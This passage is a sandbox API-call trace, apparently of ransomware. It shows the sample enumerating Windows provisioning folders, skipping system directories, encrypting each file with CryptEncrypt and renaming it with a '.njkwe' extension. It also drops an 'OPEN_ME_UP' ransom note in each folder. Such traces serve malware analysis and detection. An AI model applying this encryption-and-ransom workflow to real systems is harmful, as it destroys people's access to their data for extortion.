nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.457] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.457] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.457] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.457] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.457] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.457] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\..") returned 96 [0074.457] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.457] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e6fcbc, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e6fcbc, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e95f21, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Controls.provxml", cAlternateFileName="")) returned 1 [0074.457] lstrcmpiW (lpString1="0__Power_Controls.provxml", lpString2="Windows") returned -1 [0074.457] lstrcmpiW (lpString1="0__Power_Controls.provxml", lpString2="$Recycle.bin") returned 1 [0074.457] lstrcmpiW (lpString1="0__Power_Controls.provxml", lpString2="System Volume Information") returned -1 [0074.457] lstrcmpiW (lpString1="0__Power_Controls.provxml", lpString2="Program Files") returned -1 [0074.457] lstrcmpiW (lpString1="0__Power_Controls.provxml", lpString2="Program Files (x86)") returned -1 [0074.457] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\0__Power_Controls.provxml") returned 119 [0074.457] StrStrIW (lpFirst="0__Power_Controls.provxml", lpSrch=".njkwe") returned 0x0 [0074.457] lstrcmpW (lpString1="0__Power_Controls.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.457] lstrcmpW (lpString1="0__Power_Controls.provxml", lpString2="taridd") returned -1 [0074.457] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\0__Power_Cont", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\0__Power_Controls.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\0__power_controls.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0074.458] GetTickCount () returned 0x1152f79 [0074.458] GetTickCount () returned 0x1152f79 [0074.458] GetTickCount () returned 0x1152f79 [0074.458] GetTickCount () returned 0x1152f79 [0074.458] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0074.458] GetProcessHeap () returned 0xbe0000 [0074.458] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0074.458] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x168, lpOverlapped=0x0) returned 1 [0074.459] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.459] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x168, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x168, lpOverlapped=0x0) returned 1 [0074.459] GetProcessHeap () returned 0xbe0000 [0074.459] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0074.459] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.459] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0074.460] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0074.460] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0074.460] CloseHandle (hObject=0x43c) returned 1 [0074.460] GetProcessHeap () returned 0xbe0000 [0074.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0074.460] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\0__Power_Controls.provxml_r00t_{3sXlE5}.njkwe") returned 139 [0074.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\0__Power_Controls.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\0__power_controls.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\0__Power_Controls.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\0__power_controls.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0074.461] GetProcessHeap () returned 0xbe0000 [0074.461] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0074.461] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e95f21, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e95f21, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e95f21, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Power_Controls.provxml", cAlternateFileName="")) returned 1 [0074.461] lstrcmpiW (lpString1="1__Power_Controls.provxml", lpString2="Windows") returned -1 [0074.461] lstrcmpiW (lpString1="1__Power_Controls.provxml", lpString2="$Recycle.bin") returned 1 [0074.461] lstrcmpiW (lpString1="1__Power_Controls.provxml", lpString2="System Volume Information") returned -1 [0074.461] lstrcmpiW (lpString1="1__Power_Controls.provxml", lpString2="Program Files") returned -1 [0074.461] lstrcmpiW (lpString1="1__Power_Controls.provxml", lpString2="Program Files (x86)") returned -1 [0074.461] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\1__Power_Controls.provxml") returned 119 [0074.461] StrStrIW (lpFirst="1__Power_Controls.provxml", lpSrch=".njkwe") returned 0x0 [0074.461] lstrcmpW (lpString1="1__Power_Controls.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.461] lstrcmpW (lpString1="1__Power_Controls.provxml", lpString2="taridd") returned -1 [0074.461] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\1__Power_Cont", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\1__Power_Controls.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\1__power_controls.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0074.462] GetTickCount () returned 0x1152f79 [0074.462] GetTickCount () returned 0x1152f79 [0074.462] GetTickCount () returned 0x1152f79 [0074.462] GetTickCount () returned 0x1152f79 [0074.462] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0074.462] GetProcessHeap () returned 0xbe0000 [0074.462] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0074.462] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x168, lpOverlapped=0x0) returned 1 [0074.463] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.463] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x168, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x168, lpOverlapped=0x0) returned 1 [0074.463] GetProcessHeap () returned 0xbe0000 [0074.463] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0074.463] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.463] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0074.464] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0074.464] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0074.464] CloseHandle (hObject=0x43c) returned 1 [0074.464] GetProcessHeap () returned 0xbe0000 [0074.464] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0074.465] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\1__Power_Controls.provxml_r00t_{3sXlE5}.njkwe") returned 139 [0074.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\1__Power_Controls.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\1__power_controls.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\1__Power_Controls.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\1__power_controls.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0074.465] GetProcessHeap () returned 0xbe0000 [0074.465] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0074.465] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e95f21, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e95f21, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e95f21, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Power_Controls.provxml", cAlternateFileName="")) returned 0 [0074.465] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0074.465] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0074.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.466] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0074.466] CloseHandle (hObject=0x438) returned 1 [0074.466] GetProcessHeap () returned 0xbe0000 [0074.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.467] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e95f21, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e95f21, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e95f21, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0074.467] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0074.467] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0074.467] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0074.467] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0074.467] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0074.467] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml") returned 97 [0074.467] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0074.467] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.467] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0074.467] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.467] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.467] GetTickCount () returned 0x1152f79 [0074.467] GetTickCount () returned 0x1152f79 [0074.467] GetTickCount () returned 0x1152f79 [0074.467] GetTickCount () returned 0x1152f79 [0074.467] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0074.467] GetProcessHeap () returned 0xbe0000 [0074.467] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0074.467] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x1ab, lpOverlapped=0x0) returned 1 [0074.469] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffe55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.469] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x1ab, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x1ab, lpOverlapped=0x0) returned 1 [0074.469] GetProcessHeap () returned 0xbe0000 [0074.469] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0074.469] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.469] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0074.470] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0074.470] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0074.470] CloseHandle (hObject=0x438) returned 1 [0074.470] GetProcessHeap () returned 0xbe0000 [0074.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.470] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0074.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.470] GetProcessHeap () returned 0xbe0000 [0074.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.471] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e95f21, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e95f21, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e95f21, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0074.471] FindClose (in: hFindFile=0xc19f20 | out: hFindFile=0xc19f20) returned 1 [0074.471] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0074.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.471] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0074.472] CloseHandle (hObject=0x434) returned 1 [0074.472] GetProcessHeap () returned 0xbe0000 [0074.472] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.472] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d139154, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d139154, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d139154, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0074.472] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0074.472] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0074.472] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.474] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0074.475] CloseHandle (hObject=0x430) returned 1 [0074.475] GetProcessHeap () returned 0xbe0000 [0074.475] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0074.475] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{23cb517f-5073-4e96-a202-7fe6122a2271}", cAlternateFileName="{23CB5~1")) returned 1 [0074.475] lstrcmpiW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="Windows") returned -1 [0074.475] lstrcmpiW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="$Recycle.bin") returned 1 [0074.475] lstrcmpiW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="System Volume Information") returned -1 [0074.475] lstrcmpiW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="Program Files") returned -1 [0074.475] lstrcmpiW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="Program Files (x86)") returned -1 [0074.475] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned 80 [0074.475] lstrcmpW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2=".") returned 1 [0074.475] lstrcmpW (lpString1="{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="..") returned 1 [0074.475] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.475] GetProcessHeap () returned 0xbe0000 [0074.475] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0074.475] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: 